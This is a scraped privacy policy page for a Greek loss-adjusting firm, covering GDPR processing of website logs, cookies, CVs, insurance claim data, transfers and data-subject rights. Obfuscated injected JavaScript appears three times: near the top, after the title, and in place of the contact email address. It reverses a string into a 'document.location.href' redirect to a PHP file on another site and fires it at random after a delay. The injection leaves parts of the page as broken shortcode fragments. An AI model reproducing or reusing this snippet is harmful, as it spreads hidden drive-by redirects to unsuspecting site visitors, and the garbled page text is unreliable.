) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tom center” us_bg_parallax=”still” us_bg_repeat=”no-repeat” us_bg_overlay_color=”rgba(10,10,10,0.3)” content_placement=”middle” us_text_color=”#ffffff” css=”.vc_custom_1545216938125{padding-right: 1.5rem !important;padding-left: 1.5rem !important;}”]

Privacy Policy

[us_post_custom_field key=”subtitlte” hide_empty=”1″ el_class=”subtitle” css=”%7B%22default%22%3A%7B%22color%22%3A%22%23f5f5f5%22%7D%7D”]
) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}to” width=”full”]

Our company,  SAVVAS G. TZANIS AND CO.  with the distinctive title “IMPERIAL CLAIMS SERVICES”, 253 Sygrou Ave. 171 22 Nea Smyrni, Attica, Greece, tel . +30 210 9426352 E – mail : $nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}to:imperial@imperial.gr”>gr   the biggest loss adjusting company in Greece, manages your data with responsibility and security in accordance with the European (EU GDPR Regulation 2016/679 ) and national data protection legislation.

By this policy we would like to inform you about the processing of your personal data in relation to the company’s activity as data controllers or data processors on behalf of third parties.

1. Purpose, legal basis and duration of processing

1.1 Data collection when visiting our website.

When you visit our website our server collects the so-called server log files , namely:

  • Date and time of entering the site.
  • The volume of data sent in bytes .
  • The browser and operating system you used when entering the site.
  • Internet Protocol address, when you enter the site. The I address is your personal data, along with the date and time of your visit, although we cannot identify you by the IP address alone.

The legal basis for collecting your IP address and keeping it in special files ( log files ) is our legitimate interest in processing these data in order to ensure the security of networks, information and services from accidental events or illegal or malicious acts as well as our legal obligation to provide a safe environment for the processing of your data (Article 6 (1) (c) and (c) of GDPR).

The data will not be transferred or used in any other way. However, we reserve the right to check the server logs if specific indications of unauthorized use occur.

[us_separator]

Cookies and similar technologies

Like most websites, we also use cookies and similar technologies when you access or browse our site. We take advantage of these technologies to make your tour comfortable and efficient.

The cookies are small text files stored on the computer’s hard drive or other electronic devices which gains access to the website. Those cookies are unique for each web browser (e.g. Google Chrome , Mozilla Firefox , Internet Explorer, Opera, etc.) and contain anonymized information regarding the websites you visit and the devices you use.

Ι. Technical/Necessary Cookies

This site uses some cookies that are necessary for its proper operation. They are necessary for the browsing of our website as well as to access its sections. The provision of basic web site services is not possible without the use of these cookies.

ΙΙ. Web Analytics Cookies/GoogleAnalytics

We use  Google Analytics Cookies, a   web analytics service provided by Google LLC . On our behalf, Google will use this information to evaluate the use of our website. The IP address that is transmitted by your browser and processed by Google Analytics is not merged with other Google data. You may deny the use of Google Analytics by selecting the appropriate settings in your browser, as listed below. However, in this case you may not be able to use the full functionality of this site.

You may find more information here . You can also view Google’s privacy policy . You can totally block your data collection through Google Analytics by installing the following plugin in your browser: tout”>https://tools.google.com/dlpage/gaoptout

You can set up your browser in a way to accept or block all or part of the cookies. Each browser differs on the cookies’ management settings. This is described in the browser’s help menu, which explains how to change the cookie settings. Follow the links below depending on your browser:

Firefox
Safari
Opera

Please note that you must adjust the settings separately for each browser and each device you use. Please also note that our site’s functionality may be restricted if cookies are not accepted.

You may see a list of the cookies here

1.2 Communication via Contact Us form

In the context of communication between us through our contact form and e-mail, we collect your name and E – mail as well as any other information you may provide to us during our communication. This data is stored and used exclusively to respond to your request. The legal basis for the processing of your personal data is your consent, Article 6 (1) (a) of the GDPR. Your data will be deleted after the final processing of our communication, provided there are no legal claims to store such data.

1.3 Submitting a CV

When you submit a CV to our Company, you provide us with your personal data included in your CV, such as your name and surname, education, past working experience, special knowledge, professional skills and preferences, etc. and other information that you may wish to disclose to us, such as your photo.

We will keep your data for three years and the legal basis for the processing of your personal data for that purpose is your consent (Article 6 (1) (a) of GDPR).

1.4 Reporting a loss

Our Company, in its capacity as a Correspondent of more than 300 foreign insurance companies and as the biggest loss adjusting company in Greece on behalf of the Hellenic Motor Insurers’ Bureau as well as Greek Insurance Companies, collects and processes your Personal Data on behalf of M.I.B and the insurance companies who are the Data Controllers of you data.

When you report a loss to us, we collect your data in order to process it in accordance with the instructions given to us by the insurance company and the M.I.B. on behalf of which we settle your loss and claim, and in particular to assess the legality and the merits of your claim as well as to determine the amount of your compensation. The legal basis for the collection and processing of your data is compliance with a legal obligation of the data controller, conclusion or performance of a contract, protection of the vital interests of the data subject or other person as well as the legitimate interests pursued by the controller which consists of supporting its legal duties (GDPR Article 6 (1), (b), (c), (d) ad (f).

The legal basis for the processing of any specific (“sensitive”) data such as, for example, Health data, is the establishment, exercise or defence of legal claims as well as the protection of the vital interests of the data subject (GDPR Article 9 (2) (c), (f).

We may also share your personal data with further parties, such as government departments, to comply with legal and fiscal obligations

We keep your data for as long as necessary to process your claim and comply with our contractual and other legal and tax obligations and your possible future service, 5 years after the definitive closure of the damage file.

2. Recipients – Data Transfers

Your data will be accessible to our staff who is authorized to handle the claims, or who perform administrative and other auxiliary tasks. Your data will also be processed by third parties, individulas or legal entities, processors or sub-processors who provide us special services such as engineers, claims, vehicle repair or medical experts, legal services, accounting services, information systems support, etc.)

We make every effort to ensure that your data is secure and protected from unauthorized processing, accidental or fraudulent loss and destruction, and unauthorized access. We have implemented an analytical information security program and we apply security controls based on the sensitivity of the information and the size of the risk of our activity, taking into account the best practices of modern technology and the cost of their implementation. We have adopted appropriate internal security policies and procedures, policies and technologies that ensure data security, and have educated our executives and our staff to observe confidentiality and privacy rules. All our staff are bound by confidentiality agreements to ensure the security and integrity of your data, and all third parties that provide us with external services as Data Processors are bound by special Data Processing Agreements that ensure at least the same security level during processing.

When you report a loss to us, we will transfer your data to the respective Greek or Foreign Insurance Company to check the legality of the claim and its obligation to cover the reported loss. Your data may also be forwarded to the Hellenic Motor Insurers’ Bureau (http://www.mib-hellas.gr), 9, Xenofontos Str. Athens, Greece, tel . 10-3223324 – 210-3236562 – 210-3238402 E- mail : claims@mib-hellas.gr. In addition to the above, we may transmit your data to government departments and other authorities (eg tax authorities, Bank of Greece) in order to comply with legal obligations.

Finally, we may have to transfer your data to third countries (outside the European Union) when necessary in order to process your claim (for example, if you, your insurance company or other insurance company involved are domiciled in a non-EU country) and only under the terms and conditions of Articles 44-49 of the GDPR especially Art. 49 (1) (b), (c), (e) (establishment, exercise or defense of legal claims, performance of a contract in the interest of the data subject, etc.)

3. Your rights

You may contact us any time in order to exercise your rights under Articles 15 to 22 of the GDPR (rights of access, correction, deletion – where allowed -, limitation of processing) as well as for any issues regarding your privacy. You may also file a complaint regarding the use of your data to the Greek Data Protection Authority, 1-3 Kifissias Ave., 115 23, Athens, Call Center: + 30-210 6475600 or at the e-mail address http://www.dpa.gr/

April, 2019

Menu